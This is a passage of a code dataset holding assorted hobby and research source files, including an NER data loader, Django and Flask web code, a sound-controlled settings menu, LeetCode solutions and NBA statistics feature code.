= all caps\n 2 = first letter caps\n 3 = one capital (not first letter)\n \"\"\"\n if s.lower() == s:\n return 0\n elif s.upper() == s:\n return 1\n elif s[0].upper() == s[0]:\n return 2\n else:\n return 3\n\n\ndef hand_features_to_idx(sentences):\n hand_to_idx = []\n count = 0\n for s in sentences:\n hand_to_idx.append(list(range(count, count + len(s))))\n count += len(s)\n\n return(hand_to_idx)\n\n\n\ndef prepare_sentence(str_words, word_to_id, char_to_id, lower=False):\n \"\"\"\n Prepare a sentence for evaluation.\n \"\"\"\n def f(x): return x.lower() if lower else x\n words = [word_to_id[f(w) if f(w) in word_to_id else '']\n for w in str_words]\n chars = [[char_to_id[c] for c in w if c in char_to_id]\n for w in str_words]\n caps = [cap_feature(w) for w in str_words]\n return {\n 'str_words': str_words,\n 'words': words,\n 'chars': chars,\n 'caps': caps\n }\n\ndef seg_pred_to_idx(sentence):\n # print(type(sentence))\n seg_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n raw_label=word_info[-2]\n if raw_label[0]=='O':\n seg_pred_ids.append(0)\n else:\n seg_pred_ids.append(1)\n return seg_pred_ids\n\n\ndef seg_pred_to_idx_prev(sentence):\n \n seg_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n pred_label=word_info[-1]\n\n if pred_label=='O':\n seg_pred_ids.append(0)\n else:\n seg_pred_ids.append(1)\n # elif pred_label.startswith(\"B\"):\n # code_pred_ids.append(1)\n # elif pred_label.startswith(\"I\"):\n # code_pred_ids.append(2)\n\n return seg_pred_ids\n\n\ndef ctc_pred_to_idx(sentence, ctc_pred_dict):\n \n ctc_pred_ids = []\n for word_iter in range(len(sentence)):\n word =sentence[word_iter][0]\n if word in ctc_pred_dict:\n ctc_pred_ids.append(int(ctc_pred_dict[word]))\n else:\n ctc_pred_ids.append(0)\n\n # print(ctc_pred_ids)\n return ctc_pred_ids\n\ndef ner_pred_to_idx(sentence, tag_to_id):\n \n ner_pred_ids = []\n for word_iter in range(len(sentence)):\n word_info=sentence[word_iter]\n pred_label=word_info[3]\n\n pred_label_id = tag_to_id[pred_label]\n ner_pred_ids.append(pred_label_id)\n\n return ner_pred_ids\n\n\ndef prepare_dataset(sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower=True):\n \"\"\"\n Prepare the dataset. Return a list of lists of dictionaries containing:\n - word indexes\n - word char indexes\n - tag indexes\n \"\"\"\n def f(x): return x.lower() if lower else x\n data = []\n hands = hand_features_to_idx(sentences)\n \n for i, s in enumerate(sentences):\n str_words = [w[0] for w in s]\n words = [word_to_id[f(w) if f(w) in word_to_id else '']\n for w in str_words]\n # Skip characters that are not in the training set\n chars = [[char_to_id[c] for c in w if c in char_to_id]\n for w in str_words]\n caps = [cap_feature(w) for w in str_words]\n tags = [tag_to_id[w[-1]] for w in s]\n hand = hands[i]\n seg_pred_ids=seg_pred_to_idx(s)\n # seg_pred_ids = seg_pred_to_idx(s)\n ctc_pred_ids = ctc_pred_to_idx(s, ctc_pred_dict)\n\n \n\n data.append({\n 'str_words': str_words,\n 'words': words,\n 'chars': chars,\n 'caps': caps,\n 'tags': tags,\n 'seg_pred': seg_pred_ids, #seg pred\n 'ctc_pred':ctc_pred_ids,\n 'handcrafted': hand\n })\n return data\n\n\ndef augment_with_pretrained(dictionary, ext_emb_path, words):\n \"\"\"\n Augment the dictionary with words that have a pretrained embedding.\n If `words` is None, we add every word that has a pretrained embedding\n to the dictionary, otherwise, we only add the words that are given by\n `words` (typically the words in the development and test sets.)\n \"\"\"\n print('Loading pretrained embeddings from %s...' % ext_emb_path)\n assert os.path.isfile(ext_emb_path)\n\n #Load pretrained embeddings from file\n pretrained = set([\n line.rstrip().split()[0].strip()\n for line in codecs.open(ext_emb_path, 'r', 'utf-8')\n if len(ext_emb_path) > 0\n ])\n\n pretrained = []\n for line in codecs.open(ext_emb_path, 'r', 'utf-8'):\n if len(ext_emb_path) > 0:\n try:\n pretrained.append(line.rstrip().split()[0].strip())\n except IndexError:\n continue\n pretrained = set(pretrained)\n for word in words:\n if word not in dictionary and any(x in pretrained for x in [word,word.lower(),re.sub('\\d', '0', word.lower())]):\n dictionary[word] = 0 #add the word from dev & test pretrained embedding with 0 freq\n\n # We either add every word in the pretrained file,\n # or only words given in the `words` list to which\n # we can assign a pretrained embedding\n\n #JT: commented_below : as adding all words from embedding throws CUDA runtime errors\n # if words is None:\n # for word in pretrained:\n # if word not in dictionary:\n # dictionary[word] = 0 #add the word from pretrained embedding with 0 freq\n # else:\n # for word in words:\n # if any(x in pretrained for x in [\n # word,\n # word.lower(),\n # re.sub('\\d', '0', word.lower())\n # ]) and word not in dictionary:\n # dictionary[word] = 0 #add the word from pretrained embedding with 0 freq\n\n word_to_id, id_to_word = create_mapping(dictionary)\n return dictionary, word_to_id, id_to_word\n\n\ndef pad_seq(seq, max_length, PAD_token=0):\n # add pads\n seq += [PAD_token for i in range(max_length - len(seq))]\n return seq\n\ndef get_batch(start, batch_size, datas, singletons=[]):\n input_seqs = []\n target_seqs = []\n chars2_seqs = []\n\n for data in datas[start:start+batch_size]:\n # pair is chosen from pairs randomly\n words = []\n for word in data['words']:\n if word in singletons and np.random.uniform() < 0.5:\n words.append(1)\n else:\n words.append(word)\n input_seqs.append(data['words'])\n target_seqs.append(data['tags'])\n chars2_seqs.append(data['chars'])\n\n if input_seqs == []:\n return [], [], [], [], [], []\n seq_pairs = sorted(zip(input_seqs, target_seqs, chars2_seqs), key=lambda p: len(p[0]), reverse=True)\n input_seqs, target_seqs, chars2_seqs = zip(*seq_pairs)\n\n chars2_seqs_lengths = []\n chars2_seqs_padded = []\n for chars2 in chars2_seqs:\n chars2_lengths = [len(c) for c in chars2]\n chars2_padded = [pad_seq(c, max(chars2_lengths)) for c in chars2]\n chars2_seqs_padded.append(chars2_padded)\n chars2_seqs_lengths.append(chars2_lengths)\n\n input_lengths = [len(s) for s in input_seqs]\n # input_padded is batch * max_length\n input_padded = [pad_seq(s, max(input_lengths)) for s in input_seqs]\n target_lengths = [len(s) for s in target_seqs]\n assert target_lengths == input_lengths\n # target_padded is batch * max_length\n target_padded = [pad_seq(s, max(target_lengths)) for s in target_seqs]\n\n # var is max_length * batch_size\n # input_var = Variable(torch.LongTensor(input_padded)).transpose(0, 1)\n # target_var = Variable(torch.LongTensor(target_padded)).transpose(0, 1)\n #\n # if use_gpu:\n # input_var = input_var.cuda()\n # target_var = target_var.cuda()\n\n return input_padded, input_lengths, target_padded, target_lengths, chars2_seqs_padded, chars2_seqs_lengths\n\n\ndef random_batch(batch_size, train_data, singletons=[]):\n input_seqs = []\n target_seqs = []\n chars2_seqs = []\n\n\n for i in range(batch_size):\n # pair is chosen from pairs randomly\n data = random.choice(train_data)\n words = []\n for word in data['words']:\n if word in singletons and np.random.uniform() < 0.5:\n words.append(1)\n else:\n words.append(word)\n input_seqs.append(data['words'])\n target_seqs.append(data['tags'])\n chars2_seqs.append(data['chars'])\n\n seq_pairs = sorted(zip(input_seqs, target_seqs, chars2_seqs), key=lambda p: len(p[0]), reverse=True)\n input_seqs, target_seqs, chars2_seqs = zip(*seq_pairs)\n\n chars2_seqs_lengths = []\n chars2_seqs_padded = []\n for chars2 in chars2_seqs:\n chars2_lengths = [len(c) for c in chars2]\n chars2_padded = [pad_seq(c, max(chars2_lengths)) for c in chars2]\n chars2_seqs_padded.append(chars2_padded)\n chars2_seqs_lengths.append(chars2_lengths)\n\n input_lengths = [len(s) for s in input_seqs]\n # input_padded is batch * max_length\n input_padded = [pad_seq(s, max(input_lengths)) for s in input_seqs]\n target_lengths = [len(s) for s in target_seqs]\n assert target_lengths == input_lengths\n # target_padded is batch * max_length\n target_padded = [pad_seq(s, max(target_lengths)) for s in target_seqs]\n\n # var is max_length * batch_size\n # input_var = Variable(torch.LongTensor(input_padded)).transpose(0, 1)\n # target_var = Variable(torch.LongTensor(target_padded)).transpose(0, 1)\n #\n # if use_gpu:\n # input_var = input_var.cuda()\n # target_var = target_var.cuda()\n\n return input_padded, input_lengths, target_padded, target_lengths, chars2_seqs_padded, chars2_seqs_lengths\n","repo_name":"jeniyat/StackOverflowNER","sub_path":"code/Attentive_BiLSTM/loader_so.py","file_name":"loader_so.py","file_ext":"py","file_size_in_byte":21229,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"68"} +{"seq_id":"27062867758","text":"from django.shortcuts import render, redirect\nfrom friends.models import Friend\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\ndef change_friends(request, operation, pk):\n friend = User.objects.get(pk=pk)\n print (friend)\n if operation == 'add':\n friendship_one, created = Friend.objects.get_or_create(owner = request.user)\n friendship_one.users.add(friend)\n friendship_two, created = Friend.objects.get_or_create(owner = friend)\n friendship_two.users.add(request.user)\n\n elif operation == 'lose':\n friendship_one = Friend.objects.get(owner=request.user)\n friendship_one.users.remove(friend)\n if not friendship_one.users.exists():\n friendship_one.delete()\n friendship_two = Friend.objects.get(owner = friend)\n friendship_two.users.remove(request.user)\n if not friendship_two.users.exists():\n friendship_two.delete()\n\n return redirect('accounts:profile', pk)\n","repo_name":"naderae/BFF","sub_path":"friends/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73667297496","text":"from vowel_recognition import *\nfrom import_json import *\nfrom emergency_detection_mode import *\n\ndef change_shortcut_sounds(dictionary):\n shortcut = input(\"Which shortcut do you want to change the shortcut sound for?\")\n if shortcut in dictionary:\n print(\"Say what you want the new shortcut sound to be?\")\n new_shortcut_sound = get_user_sounds(user_made_sounds).strip()\n shortcut_sound_in_use = is_shortcut_sound_in_use(dictionary, new_shortcut_sound)\n \n if shortcut_sound_in_use == \"not in use\":\n dictionary[shortcut] = new_shortcut_sound\n save_user_changes()\n else:\n print(\"This shortcut sound is already being used for \" + shortcut_sound_in_use + \".\")\n x = input(\"Would you like to overwrite this? y/n?\")\n if x == \"y\": \n dictionary[shortcut_sound_in_use] = \"none\"\n dictionary[shortcut] = new_shortcut_sound\n save_user_changes()\n else:\n print(\"Shortcut sound for \" + shortcut + \" has not changed.\")\n else:\n print(\"The shortcut you entered is not available in this mode.\")\n\ndef is_shortcut_sound_in_use(dictionary, sound):\n while True:\n try:\n shortcut_sound = list(dictionary.keys())[list(dictionary.values()).index(sound)]\n print(shortcut_sound[0])\n return shortcut_sound[0]\n except ValueError:\n return \"not in use\"\n\n\ndef new_user_sound(number): \n new_sound_name = input(\"Name new sound:\")\n train_sounds(new_sound_name, number)\n\ndef change_a_shortcut_sound():\n print(\"Which mode would you like to change the shortcut for?\")\n print(settings_dict[\"a\"] + \": Keyboard mode \\n\" + settings_dict[\"b\"]+ \": Mouse mode \\n\" + settings_dict[\"c\"]+ \": Hotkey Mode \\n\" + settings_dict[\"d\"] + \": Shortcuts for modes \\n\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n x = trigger_shortcut(sound_string, settings_dict) \n if x == \"a\": \n change_shortcut_sounds(keyboard_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"b\":\n change_shortcut_sounds(mouse_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"c\":\n change_shortcut_sounds(hotkey_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"d\": \n change_shortcut_sounds(mode_dict) \n print(\"Your changes have been implemented.\")\n else: \n print(\"Not an option. Please enter a, b, c or d.\")\n \n\ndef settings_mode(user_made_sounds = user_made_sounds):\n print(\"Settings Mode Started.\")\n mode_on = True\n while mode_on:\n print(\"What would you like to do? \\n\" + settings_dict[\"a\"]+ \": Change a shortcut sound. \\n\" + settings_dict[\"b\"]+ \": Create a custom sound \\n\" + settings_dict[\"c\"]+ \": Train default sounds \\n\" + settings_dict[\"d\"]+ \": Other settings. \\n\" + settings_dict[\"e\"]+ \": Reset to default settings. \\n\"+ settings_dict[\"g\"]+ \": Update emergency info \\n\" + settings_dict[\"f\"]+ \": Leave settings\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n x = trigger_shortcut(sound_string, settings_dict)\n if x == \"a\":\n change_a_shortcut_sound()\n elif x == \"b\":\n new_user_sound(4)\n elif x == \"c\": \n print(\"Do you want to \\n\" + settings_dict[\"a\"]+ \": train default sounds from scratch \\n\" + settings_dict[\"b\"]+ \": add to the existing \")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y ==\"a\":\n user_made_sounds = {\"is_tutorial_complete\": \"False\", \"\": \"\", \" \": \"\", \"finishkeyboardmode\": \"finishkeyboardmode\", \"finishhotkeymode\": \"finishhotkeymode\", \"ah\": \"ah\", \"ay\": \"ay\", \"ee\": \"ee\"}\n train_default_sounds(4)\n elif y == \"b\": \n train_default_sounds(4)\n else:\n print(\"Not an option. Please enter a or b.\")\n save_user_changes()\n elif x == \"d\":\n print(\"Change \\n\" + settings_dict[\"a\"]+ \": Threshold (How loud the sound has to be) \\n\" + settings_dict[\"b\"]+ \": Length of silence (How long the silence in mouse mode before you have to say the direction) \")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y == \"a\":\n print(\"The current threshold is \" + general_settings[\"threshold\"]+\".\")\n z = input(\"What would you like the new threshold to be? Suggested: between 0.075 and 0.125. Press X to cancel.\").strip()\n is_number = z.replace(\".\", \"\").isnumeric()\n if is_number:\n general_settings[\"threshold\"] = z\n elif z != \"X\" and z != \"x\":\n print(\"Please enter a number or X if you want to cancel.\")\n if y == \"b\":\n print(\"The current length of silence is \" + general_settings[\"length_of_silence\"]+\".\")\n z = input(\"What would you like the new length of silence to be? Note: must be an integer. Press X to cancel.\").strip()\n is_integer = z.isnumeric()\n if is_integer:\n general_settings[\"length_of_silence\"] = z\n elif z != \"X\" and z != \"x\":\n print(\"Please enter an integer or X if you want to cancel.\")\n elif x == \"e\":\n print(\"Are you sure you want to reset to default settings? You will lose all your trained sounds. \" + settings_dict[\"a\"]+ \": Yes \" + settings_dict[\"b\"]+ \": No\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y == \"a\":\n reset_to_default() \n print(\"System has been reset to default settings.\")\n else:\n print(\"System has NOT been reset.\") \n elif x == \"f\":\n print(\"Exiting settings...\")\n save_user_changes()\n mode_on = False\n elif x == \"g\":\n set_emergency_info()\n else: \n print(\"Not an option. Please enter a, b, c, d, e or f.\")\n\n \n\n\n\n","repo_name":"pulfdev/Sound_Recognition","sub_path":"settings_mode.py","file_name":"settings_mode.py","file_ext":"py","file_size_in_byte":6372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20028996649","text":"# Imports\nimport RichConsole as RC\nimport Map.Map as Map\nimport Player.Player as Player\nimport Data as Data\nimport ImportData as ImportData\n\n\n\ndef Main():\n Menu()\n\n\n\ndef Menu():\n # Main menu were player choose what he want to do\n Userchoose =\"\"\n while Userchoose != 'Q':\n Userchoose = input(\"\"\"\n (J)ouer\n (Q)uitter\n \n \"\"\").upper()\n\n if Userchoose == 'J':\n PlayGame()\n\n if Userchoose == 'Q':\n print(\"Au revoir\\n\")\n\ndef PlayGame():\n # check if the player entry is ok\n NameOk = False\n while NameOk == False :\n try :\n Data.PlayerName = str(input(f\"Quel est ton nom ?\\n\"))\n if len(Data.PlayerName) > 0 :\n NameOk = True\n except :\n continue\n\n print(\n \"\"\"\n Tu te réveille sur une île tropicale. Tu te releves et apercois un sac à dos contenant une carte,\n un chargeur solaire, un couteau et une bouteille.Une note te dis de résoudre les énigmes et d'aller\n tout d'abord voir le sphinx au Nord.\n \"\"\")\n Pause = input('presse une touche pour continuer')\n \n\n RC.ClearConsole()\n # import all files needed\n ImportData.LoadMapElementsFromFile()\n ImportData.LoadPlayerFile()\n Map.LoadMap()\n Data.PlayerData['Alive'] = True\n \n # principal loop of game \n while Data.Action != \"Q\" and Data.PlayerData['Alive']== True and Data.Victory == False :\n Map.DrawMap()\n Player.Draw()\n Player.PrintPlayerStats()\n Player.ActionOfPlayer()\n\n\n \n \n\n\ndef ChargedGame() :\n pass\n\n\nif __name__==\"__main__\":\n Main()","repo_name":"Alpharius61/Projet1","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21406927688","text":"#https://leetcode.com/problems/robot-return-to-origin/\n\nclass Solution:\n def judgeCircle(self, moves: str) -> bool:\n dictionary = {'R':1,'L':-1,'U':1,'D':-1}\n x,y=0,0\n for i in moves:\n if i == 'R' or i == 'L':\n x += dictionary[i]\n else:\n y += dictionary[i]\n if x==0 and y==0:\n return True\n else:\n return False\n\ndef stringToString(input):\n import json\n\n return json.loads(input)\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n moves = stringToString(line);\n \n ret = Solution().judgeCircle(moves)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"mitsuk-maksim/tg_mpei_course","sub_path":"657. Robot Return to Origin.py","file_name":"657. Robot Return to Origin.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37682016792","text":"class Solution:\n @cache\n def dp(self, num):\n if num == 1:\n return 0\n\n if num % 2:\n return 1 + self.dp(num * 3 + 1)\n return 1 + self.dp(num // 2)\n \n \n def quickselect(self, left, right, nums, k):\n pivot, pointer = nums[right], left\n \n for idx in range(left, right):\n if nums[idx] <= pivot:\n nums[pointer], nums[idx] = nums[idx], nums[pointer]\n pointer += 1\n \n \n nums[pointer], nums[right] = nums[right], nums[pointer]\n \n if pointer > k:\n return self.quickselect(left, pointer - 1, nums, k)\n if pointer < k:\n return self.quickselect(pointer + 1, right, nums, k)\n \n return nums[pointer][1]\n \n \n def getKth(self, lo: int, hi: int, k: int) -> int:\n \"\"\"\n bruteforce is a dp approach by saving\n \n for idx in range(12, 15):\n dp(idx)\n \n dp(idx)\n if idx == 1:\n return 0\n \n if even, and if odd\n return\n \n \n sort the nums based on their values\n return nums[k - 1]\n \"\"\"\n nums = []\n for num in range(lo, hi + 1):\n nums.append([self.dp(num), num])\n \n \n return self.quickselect(0, len(nums) - 1, nums, k - 1)\n","repo_name":"Henok-Matheas/competitive_programming","sub_path":"1387-sort-integers-by-the-power-value/1387-sort-integers-by-the-power-value.py","file_name":"1387-sort-integers-by-the-power-value.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23260544815","text":"#!/usr/bin/python3\n#input functions take input from keyboard,with the string in bracket printed when input function is run.\nname = input('what is your name you beautiful thang? ')\nage = input('what is your age? ')\n#print functions prints everything like a string\n#{age:d} will cast age as the integer it is and not string. x=hex,b=binary,s=string\nprint(f'hello, {name} you are {age} year old')\n\nstr1 = 'welcome' #to assign string, or print a string always put in parenthesis\nstr2 = 'to my program'\nwelcome = str1 + \" \" + str2 + \" \" + 3 * \"Hurray! \" #strings can be concated like this\nprint(welcome)\n\nlove = \"\"\"\nI love you so much\nplease marry me\nWe will live forever happy together\n\"\"\"\n\nprint(name, '!' , 'you are so pretty', love)","repo_name":"chesahkalu/random_python_basics","sub_path":"Beginer_basics/1-yourname.py","file_name":"1-yourname.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72451359258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 28 16:28:58 2020\n\n@author: Gunna\n\"\"\"\n\nimport os\nimport xmltodict\n\n#################### Path Declaration ####################\nhomePath = os.path.join( os.getcwd( )[ : os.getcwd( ).find( \"Programming\") ], \"Programming\" )\ntrainPath = os.path.join( homePath, \"training\" )\nprepPath = os.path.join( homePath, \"prep\" )\npngPath = os.path.join( homePath, \"pngData/test/\" )\npackagePath = os.path.join( homePath, \"packages\" )\ntempPath = os.path.join( homePath, \"temp\" )\n##########################################################\n\n\npath = os.path.join( prepPath, \"labeled\" )\n\nxmlFiles = os.listdir( path )\n\nlabelList = []\n\nfor file in xmlFiles:\n \n with open( os.path.join( path, file ) ) as f:\n doc = xmltodict.parse( f.read( ) )\n \n imName = doc[ \"annotation\" ][ \"filename\" ]\n imPath = doc[ \"annotation\" ][ \"path\" ]\n bndBox = doc[ \"annotation\" ][ \"object\" ][ \"bndbox\" ]\n name = doc[ \"annotation\" ][ \"object\" ][ \"name\" ]\n xmin = int( bndBox[ \"xmin\" ] )\n xmax = int( bndBox[ \"xmax\" ] )\n ymin = int( bndBox[ \"ymin\" ] )\n ymax = int( bndBox[ \"ymax\" ] )\n \n labelList.append( [ imPath, imName, xmin, ymin, xmax, ymax ] )\n\ncsvString = \"Bild Pfad;Bild Name;xMin;yMin;xMax;yMax\\n\"\n\nfor entry in labelList:\n csvString += f\"{entry[ 0 ]};{entry[ 1 ]};{entry[ 2 ]};{entry[ 3 ]};{entry[ 4 ]};{entry[ 5 ]}\\n\"\n \nwith open( os.path.join( prepPath, \"labelList.csv\" ), \"w+\" ) as f:\n f.write( csvString )","repo_name":"gufu1995/diplom_software","sub_path":"prep/backup/labelCheck.py","file_name":"labelCheck.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42121283390","text":"from user_profile.models import UserProfile\nfrom django import forms\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\nACCOUNT_CHOICE=[\n ('business','Business'),\n ('marketer','Marketer'),\n ('individual','Individual'),\n]\n\nclass UserProfileModelForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('image', 'rc_number', 'company_name', 'website')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass PersonalProfileModelForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('image', 'name', 'surname', 'middle_name', 'phone_number')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\n\n\n","repo_name":"sesdave/sugos","sub_path":"user_profile/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28798552664","text":"import os\nfrom flask import Flask, jsonify\nfrom flask_restful import Resource, Api\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napi = Api(app)\n\napp_settings = os.getenv('APP_SETTINGS')\napp.config.from_object(app_settings)\n\ndb = SQLAlchemy(app)\n\nclass User(db.Model): # new\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String(128), nullable=False)\n email = db.Column(db.String(128), nullable=False)\n active = db.Column(db.Boolean(), default=True, nullable=False)\n\n def __init__(self, username, email):\n self.username = username\n self.email = email\n\nclass UsersResource(Resource):\n def get(self):\n return {\n 'status': 'success',\n 'message': 'success msg'\n }\n\napi.add_resource(UsersResource, '/users/test')\n","repo_name":"bwdmonkey/FreeEyeOutFront","sub_path":"services/users/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8857383663","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 11:20:19 2019\n\n@author: dongdong\n\"\"\"\nfrom django.urls import path,re_path\nfrom . import views\n\napp_name = 'article' # 一定要写这一行,否则html中会报错 'article' is not a registered namespace\n\nurlpatterns = [\n path('myalgo-column/', views.myalgo_column, name=\"myalgo_column\"),\n \n #path('myalgo-opt-detail/', views.myalgo_opt_detail, name=\"myalgo_opt_detail\"),\n path('myalgo-list-to-edit/', views.myalgo_list_to_edit, name=\"myalgo_list_to_edit\"),\n path('myalgo-post/', views.myalgo_post, name=\"myalgo_post\"),\n path('myalgoopt-post/', views.myalgoopt_post, name=\"myalgoopt_post\"),\n path('myalgo-list/', views.myalgo_list, name=\"myalgo_list\"),\n re_path('myalgo-detail/(?P\\d+)/(?P[-\\w]+)/$', views.myalgo_detail, name=\"myalgo_detail\"),\n path('myalgo-opt/', views.myalgoopt_list, name=\"myalgoopt_list\"),\n\n path('del-myalgoopt/', views.del_myalgoopt, name=\"del_myalgoopt\"), \n path('del-myalgo/', views.del_myalgo, name=\"del_myalgo\"), \n path('redit-myalgo//', views.redit_myalgo, name=\"redit_myalgo\"), \n path('redit-myalgoopt//', views.redit_myalgoopt, name=\"redit_myalgoopt\"), \n re_path('myalgo-opt-detail/(?P\\d+)/(?P[-\\w]+)/$', views.myalgo_opt_detail, name=\"myalgo_opt_detail\"),\n path('run_test//', views.run_test, name=\"run_test\"),\n path('run_algo_opt//', views.run_algo_opt, name=\"run_algo_opt\"),\n]","repo_name":"dongdong12311/cnic_portfolio","sub_path":"lehehe/article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35058631898","text":"#-*- coding: utf-8 -*-\n\nfrom tqdm import tqdm\nimport soundfile as sf\nimport numpy as np\nimport pysptk\nimport pyworld\nfrom nnmnkwii.preprocessing.alignment import DTWAligner\nimport nnmnkwii.metrics\n\naligner = DTWAligner()\n\ndef get_mc(wav):\n y, sr = sf.read(wav)\n y = y.astype(np.float64)\n f0, timeaxis = pyworld.dio(y, sr, frame_period=5)\n f0 = pyworld.stonemask(y, f0, timeaxis, sr)\n spectrogram = pyworld.cheaptrick(y, f0, timeaxis, sr)\n mc = pysptk.sp2mc(spectrogram, order=24, alpha=0.41)\n mc = mc.astype(np.float32)\n\n return mc\n\n\ndef get_mcd(inp, ref):\n # extract mc\n inp_mc = get_mc(inp)\n ref_mc = get_mc(ref)\n\n # alignment\n inp = np.expand_dims(inp_mc, 0) # rank=3\n ref = np.expand_dims(ref_mc, 0) # rank=3\n\n inp_aligned, ref_aligned = aligner.transform((inp, ref))\n\n inp_aligned = np.squeeze(inp_aligned)\n ref_aligned = np.squeeze(ref_aligned)\n\n # calc mcd\n mcd = nnmnkwii.metrics.melcd(inp_aligned, ref_aligned)\n\n return mcd\n\n\nif __name__ == \"__main__\":\n def run(token_type):\n mcd_li = []\n for i in tqdm(range(1, 101)):\n inp = 'samples/{}/{}.wav'.format(token_type, i)\n ref = '/data/public/rw/jss/jss/{}.wav'.format(9900-1+i)\n mcd = get_mcd(inp, ref)\n mcd_li.append(mcd)\n mcd_li = np.array(mcd_li)\n print('{}'.format(token_type))\n print('mean =', mcd_li.mean())\n print('var =', mcd_li.var())\n\n # run(\"char\")\n # run(\"j\")\n # run(\"hcj\")\n # run(\"shcj\")\n run(\"sj\")","repo_name":"kakaobrain/jejueo","sub_path":"speech/mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"68"} +{"seq_id":"20336482411","text":"import pandas as pd\nimport numpy as np\nfrom common_functions.utils import DataObject\nfrom multiprocessing import get_context\nenv = 'linux'\n#%%\nif env == 'mac':\n root_data_dir = '/Users/danny/nba_bets/data/'\nelif env == 'linux':\n root_data_dir = '/home/danny/nba/data/'\n\n\ndef getTeamStats(abv, latestdate):\n # edit this function for additional feature eng\n team_subset = df1[df1['TEAM_ABBREVIATION'] == abv].copy()\n team_subset['GAME_DATE'] = pd.to_datetime(team_subset['GAME_DATE'])\n team_subset.index = team_subset['GAME_DATE']\n team_subset.sort_index(inplace=True, ascending=False)\n colnames = team_subset.columns\n stats_columns = ['PTS', 'FGM', 'FGA', 'FG_PCT',\n 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB',\n 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF']\n date_subset = team_subset[team_subset['GAME_DATE'] < latestdate].copy()\n date_subset['numerical_wins'] = np.where(date_subset['WL'] == 'L', 0, 1)\n date_subset['location'] = np.where(date_subset['MATCHUP'].str.contains('@'), -1, 1)\n date_reversed = date_subset.iloc[::-1].copy()\n date_reversed['window_sum10'] = date_reversed['numerical_wins'].rolling(10).sum()\n date_reversed['window_sum5'] = date_reversed['numerical_wins'].rolling(5).sum()\n date_reversed['window_sum3'] = date_reversed['numerical_wins'].rolling(3).sum()\n stats_columns.extend(['window_sum10', 'window_sum5', 'window_sum3', 'location', 'numerical_wins', 'break_days'])\n date_subset = date_reversed.copy()\n date_subset['LAG_DATA'] = date_subset['GAME_DATE'].shift(1)\n date_subset['break_days'] = date_subset[\"GAME_DATE\"] - date_subset[\"LAG_DATA\"]\n date_subset['break_days'] = date_subset['break_days'].dt.days\n current_stats = date_subset.iloc[-11:, [date_subset.columns.get_loc(c) for c in stats_columns]].copy()\n base_points = current_stats['PTS']\n current_stats['PIE'] = (\n current_stats['PTS'] + current_stats['FGM'] + current_stats['FTM'] - current_stats[\n 'FTA'] + current_stats['DREB'] +\n current_stats['OREB'] + current_stats['AST'] + current_stats['STL'] + 